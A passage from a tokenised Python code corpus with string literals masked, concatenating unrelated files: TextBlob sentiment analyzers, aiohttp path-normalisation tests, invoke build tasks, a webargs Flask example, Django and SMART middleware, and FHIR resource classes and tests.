'<STR_LIT:index>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> } <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from collections import namedtuple <EOL> import nltk <EOL> from textblob . en import sentiment as pattern_sentiment <EOL> from textblob . tokenizers import word_tokenize <EOL> from textblob . decorators import requires_nltk_corpus <EOL> from textblob . base import BaseSentimentAnalyzer , DISCRETE , CONTINUOUS <EOL> class PatternAnalyzer ( BaseSentimentAnalyzer ) : <EOL> """<STR_LIT>""" <EOL> kind = CONTINUOUS <EOL> RETURN_TYPE = namedtuple ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def analyze ( self , text ) : <EOL> """<STR_LIT>""" <EOL> return self . RETURN_TYPE ( * pattern_sentiment ( text ) ) <EOL> def _default_feature_extractor ( words ) : <EOL> """<STR_LIT>""" <EOL> return dict ( ( ( word , True ) for word in words ) ) <EOL> class NaiveBayesAnalyzer ( BaseSentimentAnalyzer ) : <EOL> """<STR_LIT>""" <EOL> kind = DISCRETE <EOL> RETURN_TYPE = namedtuple ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def __init__ ( self , feature_extractor = _default_feature_extractor ) : <EOL> super ( NaiveBayesAnalyzer , self ) . __init__ ( ) <EOL> self . _classifier = None <EOL> self . feature_extractor = feature_extractor <EOL> @ requires_nltk_corpus <EOL> def train ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( NaiveBayesAnalyzer , self ) . train ( ) <EOL> neg_ids = nltk . corpus . movie_reviews . fileids ( '<STR_LIT>' ) <EOL> pos_ids = nltk . corpus . movie_reviews . fileids ( '<STR_LIT>' ) <EOL> neg_feats = [ ( self . feature_extractor ( <EOL> nltk . corpus . movie_reviews . words ( fileids = [ f ] ) ) , '<STR_LIT>' ) for f in neg_ids ] <EOL> pos_feats = [ ( self . feature_extractor ( <EOL> nltk . corpus . movie_reviews . words ( fileids = [ f ] ) ) , '<STR_LIT>' ) for f in pos_ids ] <EOL> train_data = neg_feats + pos_feats <EOL> self . _classifier = nltk . classify . NaiveBayesClassifier . 
train ( train_data ) <EOL> def analyze ( self , text ) : <EOL> """<STR_LIT>""" <EOL> super ( NaiveBayesAnalyzer , self ) . analyze ( text ) <EOL> tokens = word_tokenize ( text , include_punc = False ) <EOL> filtered = ( t . lower ( ) for t in tokens if len ( t ) >= <NUM_LIT:3> ) <EOL> feats = self . feature_extractor ( filtered ) <EOL> prob_dist = self . _classifier . prob_classify ( feats ) <EOL> return self . RETURN_TYPE ( <EOL> classification = prob_dist . max ( ) , <EOL> p_pos = prob_dist . prob ( '<STR_LIT>' ) , <EOL> p_neg = prob_dist . prob ( "<STR_LIT>" ) <EOL> ) </s>
<s> from aiohttp import web <EOL> import pytest <EOL> from aiohttp_utils import path_norm , CONFIG_KEY <EOL> from aiohttp_utils . path_norm import normalize_path_middleware <EOL> from . conftest import make_dummy_handler <EOL> @ pytest . fixture ( ) <EOL> def app ( loop ) : <EOL> return web . Application ( loop = loop ) <EOL> @ pytest . fixture ( ) <EOL> def client ( create_client , app ) : <EOL> return create_client ( app ) <EOL> def add_routes ( app ) : <EOL> app . router . add_route ( '<STR_LIT:GET>' , '<STR_LIT:/>' , make_dummy_handler ( ) ) <EOL> app . router . add_route ( '<STR_LIT:GET>' , '<STR_LIT>' , make_dummy_handler ( ) ) <EOL> def handler1 ( req ) : <EOL> raise web . HTTPNotFound ( ) <EOL> def handler2 ( req ) : <EOL> pass <EOL> app . router . add_route ( "<STR_LIT:GET>" , '<STR_LIT>' , handler1 ) <EOL> app . router . add_route ( "<STR_LIT:GET>" , "<STR_LIT>" , handler2 ) <EOL> def configure_app ( app , overrides = None , setup = False ) : <EOL> overrides = overrides or { } <EOL> add_routes ( app ) <EOL> if setup : <EOL> path_norm . setup ( app , ** overrides ) <EOL> else : <EOL> middleware = path_norm . normalize_path_middleware ( ** overrides ) <EOL> app . middlewares . append ( middleware ) <EOL> class TestNormalizePathMiddleware : <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ True , False ] ) <EOL> def test_appends_slash_by_default ( self , app , client , setup ) : <EOL> configure_app ( app , overrides = None , setup = setup ) <EOL> res = client . get ( '<STR_LIT>' ) <EOL> assert res . status_code == <NUM_LIT:200> <EOL> res = client . get ( '<STR_LIT>' ) <EOL> assert res . status_code == <NUM_LIT> <EOL> res = res . follow ( ) <EOL> assert res . request . path_qs == '<STR_LIT>' <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ True , False ] ) <EOL> def test_merges_slash_by_default ( self , app , client , setup ) : <EOL> configure_app ( app , overrides = None , setup = setup ) <EOL> res = client . get ( '<STR_LIT>' ) <EOL> assert res . 
status_code == <NUM_LIT:200> <EOL> res = client . get ( '<STR_LIT>' ) <EOL> assert res . status_code == <NUM_LIT> <EOL> res = res . follow ( ) <EOL> assert res . request . path_qs == '<STR_LIT>' <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ True , False ] ) <EOL> def test_append_slash_false_not_found ( self , app , client , setup ) : <EOL> configure_app ( app , { <EOL> '<STR_LIT>' : False <EOL> } , setup = setup ) <EOL> res = client . get ( '<STR_LIT>' , expect_errors = True ) <EOL> assert res . status_code == <NUM_LIT> <EOL> def test_append_slash ( self , app , client ) : <EOL> configure_app ( app , { <EOL> '<STR_LIT>' : True <EOL> } ) <EOL> res = client . get ( '<STR_LIT>' ) <EOL> assert res . status_code == <NUM_LIT:200> <EOL> res = client . get ( '<STR_LIT>' ) <EOL> assert res . status_code == <NUM_LIT> <EOL> res = res . follow ( ) <EOL> assert res . request . path_qs == '<STR_LIT>' <EOL> def test_append_slash_with_query_string ( self , app , client ) : <EOL> configure_app ( app , { <EOL> '<STR_LIT>' : True <EOL> } ) <EOL> res = client . get ( '<STR_LIT>' ) <EOL> assert res . status_code == <NUM_LIT> <EOL> res = res . follow ( ) <EOL> assert res . status_code == <NUM_LIT:200> <EOL> assert res . request . path_qs == '<STR_LIT>' <EOL> @ pytest . mark . parametrize ( '<STR_LIT:url>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_merge_slashes ( self , app , client , url ) : <EOL> configure_app ( app , { <EOL> '<STR_LIT>' : True <EOL> } ) <EOL> res = client . get ( url ) <EOL> assert res . status_code == <NUM_LIT> <EOL> res = res . follow ( ) <EOL> assert res . request . path_qs == '<STR_LIT>' <EOL> def test_404_if_request_has_body ( self , app , client ) : <EOL> configure_app ( app , { '<STR_LIT>' : True , '<STR_LIT>' : True } ) <EOL> res = client . post ( '<STR_LIT>' , { '<STR_LIT:foo>' : <NUM_LIT> } , expect_errors = True ) <EOL> assert res . 
status_code == <NUM_LIT> <EOL> def test_404_raised_by_handler ( self , app , client ) : <EOL> configure_app ( app , { '<STR_LIT>' : True } ) <EOL> res = client . get ( '<STR_LIT>' ) <EOL> assert res . status_code == <NUM_LIT> <EOL> res = res . follow ( expect_errors = True ) <EOL> assert res . status_code == <NUM_LIT> <EOL> def test_configuration_through_app_key ( self , app , client ) : <EOL> add_routes ( app ) <EOL> app [ CONFIG_KEY ] = { <EOL> '<STR_LIT>' : False <EOL> } <EOL> path_norm . setup ( app ) <EOL> res = client . get ( '<STR_LIT>' , expect_errors = True ) <EOL> assert res . status_code == <NUM_LIT> </s>
<s> import os <EOL> import webbrowser <EOL> from invoke import task , run <EOL> docs_dir = '<STR_LIT>' <EOL> build_dir = os . path . join ( docs_dir , '<STR_LIT>' ) <EOL> @ task <EOL> def test ( ) : <EOL> run ( '<STR_LIT>' , pty = True ) <EOL> @ task <EOL> def clean ( ) : <EOL> run ( "<STR_LIT>" ) <EOL> run ( "<STR_LIT>" ) <EOL> run ( "<STR_LIT>" ) <EOL> clean_docs ( ) <EOL> print ( "<STR_LIT>" ) <EOL> @ task <EOL> def clean_docs ( ) : <EOL> run ( "<STR_LIT>" % build_dir ) <EOL> @ task <EOL> def browse_docs ( ) : <EOL> path = os . path . join ( build_dir , '<STR_LIT>' ) <EOL> webbrowser . open_new_tab ( path ) <EOL> @ task <EOL> def docs ( clean = False , browse = False ) : <EOL> if clean : <EOL> clean_docs ( ) <EOL> run ( "<STR_LIT>" % ( docs_dir , build_dir ) , pty = True ) <EOL> if browse : <EOL> browse_docs ( ) <EOL> @ task <EOL> def readme ( browse = False ) : <EOL> run ( "<STR_LIT>" ) <EOL> if browse : <EOL> webbrowser . open_new_tab ( '<STR_LIT>' ) <EOL> @ task <EOL> def publish ( test = False ) : <EOL> """<STR_LIT>""" <EOL> clean ( ) <EOL> if test : <EOL> run ( '<STR_LIT>' , echo = True ) <EOL> run ( '<STR_LIT>' , echo = True ) <EOL> else : <EOL> run ( '<STR_LIT>' , echo = True ) <EOL> run ( '<STR_LIT>' , echo = True ) </s>
<s> """<STR_LIT>""" <EOL> import datetime as dt <EOL> from flask import Flask <EOL> from flask . ext import restful <EOL> from webargs import fields , validate <EOL> from webargs . flaskparser import use_args , use_kwargs , parser <EOL> app = Flask ( __name__ ) <EOL> api = restful . Api ( app ) <EOL> class IndexResource ( restful . Resource ) : <EOL> """<STR_LIT>""" <EOL> hello_args = { <EOL> '<STR_LIT:name>' : fields . Str ( missing = '<STR_LIT>' ) <EOL> } <EOL> @ use_args ( hello_args ) <EOL> def get ( self , args ) : <EOL> return { '<STR_LIT:message>' : '<STR_LIT>' . format ( args [ '<STR_LIT:name>' ] ) } <EOL> class AddResource ( restful . Resource ) : <EOL> """<STR_LIT>""" <EOL> add_args = { <EOL> '<STR_LIT:x>' : fields . Float ( required = True ) , <EOL> '<STR_LIT:y>' : fields . Float ( required = True ) , <EOL> } <EOL> @ use_kwargs ( add_args ) <EOL> def post ( self , x , y ) : <EOL> """<STR_LIT>""" <EOL> return { '<STR_LIT:result>' : x + y } <EOL> class DateAddResource ( restful . Resource ) : <EOL> dateadd_args = { <EOL> '<STR_LIT:value>' : fields . DateTime ( required = False ) , <EOL> '<STR_LIT>' : fields . Int ( required = True , validate = validate . Range ( min = <NUM_LIT:1> ) ) , <EOL> '<STR_LIT>' : fields . Str ( missing = '<STR_LIT>' , validate = validate . OneOf ( [ '<STR_LIT>' , '<STR_LIT>' ] ) ) <EOL> } <EOL> @ use_kwargs ( dateadd_args ) <EOL> def post ( self , value , addend , unit ) : <EOL> """<STR_LIT>""" <EOL> value = value or dt . datetime . utcnow ( ) <EOL> if unit == '<STR_LIT>' : <EOL> delta = dt . timedelta ( minutes = addend ) <EOL> else : <EOL> delta = dt . timedelta ( days = addend ) <EOL> result = value + delta <EOL> return { '<STR_LIT:result>' : result . isoformat ( ) } <EOL> @ parser . error_handler <EOL> def handle_request_parsing_error ( err ) : <EOL> """<STR_LIT>""" <EOL> restful . abort ( <NUM_LIT> , errors = err . messages ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> api . 
add_resource ( IndexResource , '<STR_LIT:/>' ) <EOL> api . add_resource ( AddResource , '<STR_LIT>' ) <EOL> api . add_resource ( DateAddResource , '<STR_LIT>' ) <EOL> app . run ( port = <NUM_LIT> , debug = True ) </s>
<s> from django . core . management import execute_manager <EOL> try : <EOL> import settings <EOL> except ImportError : <EOL> import sys <EOL> sys . stderr . write ( "<STR_LIT>" % __file__ ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> execute_manager ( settings ) </s>
<s> """<STR_LIT>""" <EOL> from smart . accesscontrol import security <EOL> from smart . lib . utils import DjangoVersionDependentExecutor <EOL> class LazyUser ( object ) : <EOL> def __get__ ( self , request , obj_type = None ) : <EOL> if not hasattr ( request , '<STR_LIT>' ) : <EOL> request . _cached_user = auth . get_user ( request ) <EOL> return request . _cached_user <EOL> class Authentication ( object ) : <EOL> def process_request ( self , request ) : <EOL> self . avoid_post_clobbering ( request ) <EOL> request . principal , request . oauth_request = security . get_principal ( request ) <EOL> noclobber_map = { <EOL> '<STR_LIT>' : lambda request : request . POST , <EOL> '<STR_LIT>' : lambda request : request . raw_post_data , <EOL> } <EOL> avoid_post_clobbering = DjangoVersionDependentExecutor ( noclobber_map ) <EOL> def process_exception ( self , request , exception ) : <EOL> print "<STR_LIT>" <EOL> import sys , traceback <EOL> print >> sys . stderr , exception , dir ( exception ) <EOL> traceback . print_exc ( file = sys . stderr ) <EOL> sys . stderr . flush ( ) </s>
<s> """<STR_LIT>""" <EOL> from base import * <EOL> from pha import * <EOL> from account import * <EOL> from smarthacks import * <EOL> from direct_access import * <EOL> from data_store import * </s>
<s> from . import resource <EOL> class Binary ( resource . Resource ) : <EOL> """<STR_LIT>""" <EOL> resource_name = "<STR_LIT>" <EOL> def __init__ ( self , jsondict = None ) : <EOL> """<STR_LIT>""" <EOL> self . content = None <EOL> """<STR_LIT>""" <EOL> self . contentType = None <EOL> """<STR_LIT>""" <EOL> super ( Binary , self ) . __init__ ( jsondict ) <EOL> def elementProperties ( self ) : <EOL> js = super ( Binary , self ) . elementProperties ( ) <EOL> js . extend ( [ <EOL> ( "<STR_LIT:content>" , "<STR_LIT:content>" , str , False , None , True ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , str , False , None , True ) , <EOL> ] ) <EOL> return js </s>
<s> from . import element <EOL> class ContactPoint ( element . Element ) : <EOL> """<STR_LIT>""" <EOL> resource_name = "<STR_LIT>" <EOL> def __init__ ( self , jsondict = None ) : <EOL> """<STR_LIT>""" <EOL> self . period = None <EOL> """<STR_LIT>""" <EOL> self . rank = None <EOL> """<STR_LIT>""" <EOL> self . system = None <EOL> """<STR_LIT>""" <EOL> self . use = None <EOL> """<STR_LIT>""" <EOL> self . value = None <EOL> """<STR_LIT>""" <EOL> super ( ContactPoint , self ) . __init__ ( jsondict ) <EOL> def elementProperties ( self ) : <EOL> js = super ( ContactPoint , self ) . elementProperties ( ) <EOL> js . extend ( [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" , period . Period , False , None , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , int , False , None , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , str , False , None , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , str , False , None , False ) , <EOL> ( "<STR_LIT:value>" , "<STR_LIT:value>" , str , False , None , False ) , <EOL> ] ) <EOL> return js <EOL> from . import period </s>
<s> import os <EOL> import io <EOL> import unittest <EOL> import json <EOL> from . import documentmanifest <EOL> from . fhirdate import FHIRDate <EOL> class DocumentManifestTests ( unittest . TestCase ) : <EOL> def instantiate_from ( self , filename ) : <EOL> datadir = os . environ . get ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> with io . open ( os . path . join ( datadir , filename ) , '<STR_LIT:r>' , encoding = '<STR_LIT:utf-8>' ) as handle : <EOL> js = json . load ( handle ) <EOL> self . assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> return documentmanifest . DocumentManifest ( js ) <EOL> def testDocumentManifest1 ( self ) : <EOL> inst = self . instantiate_from ( "<STR_LIT>" ) <EOL> self . assertIsNotNone ( inst , "<STR_LIT>" ) <EOL> self . implDocumentManifest1 ( inst ) <EOL> js = inst . as_json ( ) <EOL> self . assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> inst2 = documentmanifest . DocumentManifest ( js ) <EOL> self . implDocumentManifest1 ( inst2 ) <EOL> def implDocumentManifest1 ( self , inst ) : <EOL> self . assertEqual ( inst . contained [ <NUM_LIT:0> ] . id , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . created . date , FHIRDate ( "<STR_LIT>" ) . date ) <EOL> self . assertEqual ( inst . created . as_json ( ) , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . description , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . id , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . identifier [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . identifier [ <NUM_LIT:0> ] . value , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . masterIdentifier . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . masterIdentifier . value , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . related [ <NUM_LIT:0> ] . identifier . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . related [ <NUM_LIT:0> ] . identifier . value , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . source , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . 
status , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . text . div , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . text . status , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . type . text , "<STR_LIT>" ) </s>
<s> import logging <EOL> from . import reference <EOL> class FHIRReference ( reference . Reference ) : <EOL> """<STR_LIT>""" <EOL> def resolved ( self , klass ) : <EOL> """<STR_LIT>""" <EOL> owning_resource = self . owningResource ( ) <EOL> if owning_resource is None : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if klass is None : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> refid = self . processedReferenceIdentifier ( ) <EOL> if not refid : <EOL> logging . warning ( "<STR_LIT>" ) <EOL> return None <EOL> resolved = owning_resource . resolvedReference ( refid ) <EOL> if resolved is not None : <EOL> if isinstance ( resolved , klass ) : <EOL> return resolved <EOL> logging . warning ( "<STR_LIT>" . format ( refid , klass , resolved . __class__ ) ) <EOL> return None <EOL> if owning_resource . contained is not None : <EOL> for contained in owning_resource . contained : <EOL> if contained . id == refid : <EOL> owning_resource . didResolveReference ( refid , contained ) <EOL> if isinstance ( contained , klass ) : <EOL> return contained <EOL> logging . warning ( "<STR_LIT>" . format ( refid , klass , contained . __class__ ) ) <EOL> return None <EOL> ref_is_relative = '<STR_LIT>' not in self . reference and '<STR_LIT>' != self . reference [ : <NUM_LIT:4> ] <EOL> if ( sys . version_info < ( <NUM_LIT:3> , <NUM_LIT:0> ) ) : <EOL> from . import bundle <EOL> bundle = self . owningBundle ( ) <EOL> while bundle is not None : <EOL> if bundle . entry is not None : <EOL> fullUrl = self . reference <EOL> if ref_is_relative : <EOL> base = bundle . server . base_uri if bundle . server else '<STR_LIT>' <EOL> fullUrl = base + self . reference <EOL> for entry in bundle . entry : <EOL> if entry . fullUrl == fullUrl : <EOL> found = entry . resource <EOL> if isinstance ( found , klass ) : <EOL> return found <EOL> logging . warning ( "<STR_LIT>" . format ( refid , klass , found . __class__ ) ) <EOL> return None <EOL> bundle = bundle . 
owningBundle ( ) <EOL> server = None <EOL> if ref_is_relative : <EOL> server = owning_resource . server if owning_resource else None <EOL> if server is None : <EOL> logging . warning ( "<STR_LIT>" <EOL> . format ( self . reference ) ) <EOL> return None <EOL> relative = klass . read_from ( self . reference , server ) <EOL> owning_resource . didResolveReference ( refid , relative ) <EOL> return relative <EOL> def processedReferenceIdentifier ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . reference and '<STR_LIT:#>' == self . reference [ <NUM_LIT:0> ] : <EOL> return self . reference [ <NUM_LIT:1> : ] <EOL> return self . reference <EOL> import sys <EOL> if ( sys . version_info > ( <NUM_LIT:3> , <NUM_LIT:0> ) ) : <EOL> from . import bundle </s>
<s> import os <EOL> import io <EOL> import unittest <EOL> import json <EOL> from . import medication <EOL> from . fhirdate import FHIRDate <EOL> class MedicationTests ( unittest . TestCase ) : <EOL> def instantiate_from ( self , filename ) : <EOL> datadir = os . environ . get ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> with io . open ( os . path . join ( datadir , filename ) , '<STR_LIT:r>' , encoding = '<STR_LIT:utf-8>' ) as handle : <EOL> js = json . load ( handle ) <EOL> self . assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> return medication . Medication ( js ) <EOL> def testMedication1 ( self ) : <EOL> inst = self . instantiate_from ( "<STR_LIT>" ) <EOL> self . assertIsNotNone ( inst , "<STR_LIT>" ) <EOL> self . implMedication1 ( inst ) <EOL> js = inst . as_json ( ) <EOL> self . assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> inst2 = medication . Medication ( js ) <EOL> self . implMedication1 ( inst2 ) <EOL> def implMedication1 ( self , inst ) : <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . id , "<STR_LIT>" ) <EOL> self . assertTrue ( inst . isBrand ) <EOL> self . assertEqual ( inst . product . form . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . form . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . form . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:0> ] . amount . denominator . value , <NUM_LIT:1> ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:0> ] . amount . numerator . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:0> ] . amount . numerator . system , "<STR_LIT>" ) <EOL> self . 
assertEqual ( inst . product . ingredient [ <NUM_LIT:0> ] . amount . numerator . unit , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:0> ] . amount . numerator . value , <NUM_LIT:100> ) <EOL> self . assertEqual ( inst . text . status , "<STR_LIT>" ) <EOL> def testMedication2 ( self ) : <EOL> inst = self . instantiate_from ( "<STR_LIT>" ) <EOL> self . assertIsNotNone ( inst , "<STR_LIT>" ) <EOL> self . implMedication2 ( inst ) <EOL> js = inst . as_json ( ) <EOL> self . assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> inst2 = medication . Medication ( js ) <EOL> self . implMedication2 ( inst2 ) <EOL> def implMedication2 ( self , inst ) : <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . id , "<STR_LIT>" ) <EOL> self . assertTrue ( inst . isBrand ) <EOL> self . assertEqual ( inst . package . container . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . package . container . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . package . container . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . text . status , "<STR_LIT>" ) <EOL> def testMedication3 ( self ) : <EOL> inst = self . instantiate_from ( "<STR_LIT>" ) <EOL> self . assertIsNotNone ( inst , "<STR_LIT>" ) <EOL> self . implMedication3 ( inst ) <EOL> js = inst . as_json ( ) <EOL> self . assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> inst2 = medication . Medication ( js ) <EOL> self . implMedication3 ( inst2 ) <EOL> def implMedication3 ( self , inst ) : <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . 
display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . id , "<STR_LIT>" ) <EOL> self . assertTrue ( inst . isBrand ) <EOL> self . assertEqual ( inst . package . container . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . package . container . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . package . container . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . text . status , "<STR_LIT>" ) <EOL> def testMedication4 ( self ) : <EOL> inst = self . instantiate_from ( "<STR_LIT>" ) <EOL> self . assertIsNotNone ( inst , "<STR_LIT>" ) <EOL> self . implMedication4 ( inst ) <EOL> js = inst . as_json ( ) <EOL> self . assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> inst2 = medication . Medication ( js ) <EOL> self . implMedication4 ( inst2 ) <EOL> def implMedication4 ( self , inst ) : <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . id , "<STR_LIT>" ) <EOL> self . assertTrue ( inst . isBrand ) <EOL> self . assertEqual ( inst . package . container . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . package . container . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . package . container . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . text . status , "<STR_LIT>" ) <EOL> def testMedication5 ( self ) : <EOL> inst = self . instantiate_from ( "<STR_LIT>" ) <EOL> self . assertIsNotNone ( inst , "<STR_LIT>" ) <EOL> self . implMedication5 ( inst ) <EOL> js = inst . as_json ( ) <EOL> self . 
assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> inst2 = medication . Medication ( js ) <EOL> self . implMedication5 ( inst2 ) <EOL> def implMedication5 ( self , inst ) : <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . id , "<STR_LIT>" ) <EOL> self . assertTrue ( inst . isBrand ) <EOL> self . assertEqual ( inst . package . container . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . package . container . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . package . container . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . text . status , "<STR_LIT>" ) <EOL> def testMedication6 ( self ) : <EOL> inst = self . instantiate_from ( "<STR_LIT>" ) <EOL> self . assertIsNotNone ( inst , "<STR_LIT>" ) <EOL> self . implMedication6 ( inst ) <EOL> js = inst . as_json ( ) <EOL> self . assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> inst2 = medication . Medication ( js ) <EOL> self . implMedication6 ( inst2 ) <EOL> def implMedication6 ( self , inst ) : <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . id , "<STR_LIT>" ) <EOL> self . assertFalse ( inst . isBrand ) <EOL> self . assertEqual ( inst . product . form . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . form . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . form . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . 
assertEqual ( inst . product . ingredient [ <NUM_LIT:0> ] . amount . denominator . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:0> ] . amount . denominator . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:0> ] . amount . denominator . value , <NUM_LIT:1> ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:0> ] . amount . numerator . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:0> ] . amount . numerator . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:0> ] . amount . numerator . value , <NUM_LIT> ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:1> ] . amount . denominator . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:1> ] . amount . denominator . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:1> ] . amount . denominator . value , <NUM_LIT:1> ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:1> ] . amount . numerator . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . ingredient [ 